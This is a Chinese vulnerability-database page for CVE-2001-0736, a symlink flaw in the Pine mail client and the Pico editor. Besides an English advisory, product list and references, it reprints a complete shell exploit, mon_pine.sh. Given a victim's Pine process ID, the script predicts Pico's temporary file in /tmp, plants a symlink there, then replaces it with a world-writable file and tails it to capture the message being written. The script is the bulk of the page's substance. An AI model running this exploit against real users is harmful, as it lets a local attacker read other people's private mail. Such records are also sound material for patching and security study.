pine和pico编辑器任意文件覆盖漏洞

pine和pico编辑器任意文件覆盖漏洞

漏洞ID 1106130 漏洞类型 未知
发布时间 2000-12-11 更新时间 2001-10-18
图片[1]-pine和pico编辑器任意文件覆盖漏洞-安全小百科CVE编号 CVE-2001-0736
图片[2]-pine和pico编辑器任意文件覆盖漏洞-安全小百科CNNVD-ID CNNVD-200110-103
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/20493
https://www.securityfocus.com/bid/88831
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200110-103
|漏洞详情
(1)pine4.33之前版本和(2)pico编辑器,含带pine的,存在漏洞。本地用户可以借助符号连接攻击覆盖任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/2097/info

A vulnerability exists in several versions of University of Washington's Pico, a widely-distributed text editor shipped with most versions of Linux / Unix.

Under very specific circumstances, it is possible to cause this version of Pico to overwrite arbitrary files with the privilege level of the victim user.

As a result, if the attacker is able to correctly predict the name of the editor's temporary file, the current contents of the editor can be written to key system files or other data to which the user has write privileges. Depending on the user's privilege level, this could have a range of negative impacts on the host's security and operation.

Versions 3.8 and 4.3 of Pico have been confirmed vulnerable. Other versions are likely affected as well.

Note that, because the popular mail client Pine uses Pico as its editor, Pine is also vulnerable to this issue.

--------------------mon_pine.sh start--------------------------------
#!/bin/sh
# Grab local pine messages
# Usage: ./mon_pine.sh <pid of pine process>
# victim pine must use following settings
#
#  [email protected]
#  http://hacksware.com
#
# [x]  enable-alternate-editor-cmd
# [x]  enable-alternate-editor-implicitly
# editor                   = /usr/bin/vi
#

PID=$1
PICO_FILE=`printf "/tmp/pico.%.6d" $PID`
TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`
echo PICO_FILE is $PICO_FILE

#if $PICO_FILE and $TRASHCAN exists, remove them
if test -f $PICO_FILE
then
 rm -f $PICO_FILE
fi
if test -f $TRASHCAN
then
 rm -f $TRASHCAN
fi

ln -s $TRASHCAN $PICO_FILE
while :
do
 if test -f $TRASHCAN
 then
  break
 fi
done

echo Victim is Editing Pine Message
rm -f $PICO_FILE
echo We replace temporary file
touch $PICO_FILE
chmod 777 $PICO_FILE
echo "Get the message from "$PICO_FILE
echo "^C to break tailer"
tail -f $PICO_FILE
--------------------mon_pine.sh end  --------------------------------
|受影响的产品
University of Washington Pine 4.33

Redhat Linux 7.0

Redhat Linux 5.2

Redhat Linux 6.2

Mandriva Linux Mandrake 8.0

Mandriva Linux Mandrake 7.2

Mandriva Li

|参考资料

来源:XF
名称:pine-tmp-file-symlink(6367)
链接:http://xforce.iss.net/static/6367.php
来源:REDHAT
名称:RHSA-2001:042
链接:http://www.redhat.com/support/errata/RHSA-2001-042.html
来源:MANDRAKE
名称:MDKSA-2001:047
链接:http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-047.php3?dis=8.0
来源:BUGTRAQ
名称:20010527[ESA-20010509-01]pinetemporaryfilehandlingvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=99106787825229&w;=2
来源:BUGTRAQ
名称:20010416ImmunixOSSecurityupdateforpine
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=98749102621604&w;=2

相关推荐: Microsoft Win9x Challenge Replay Vulnerability

Microsoft Win9x Challenge Replay Vulnerability 漏洞ID 1104879 漏洞类型 Design Error 发布时间 1999-01-05 更新时间 1999-01-05 CVE编号 N/A CNNVD-ID N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享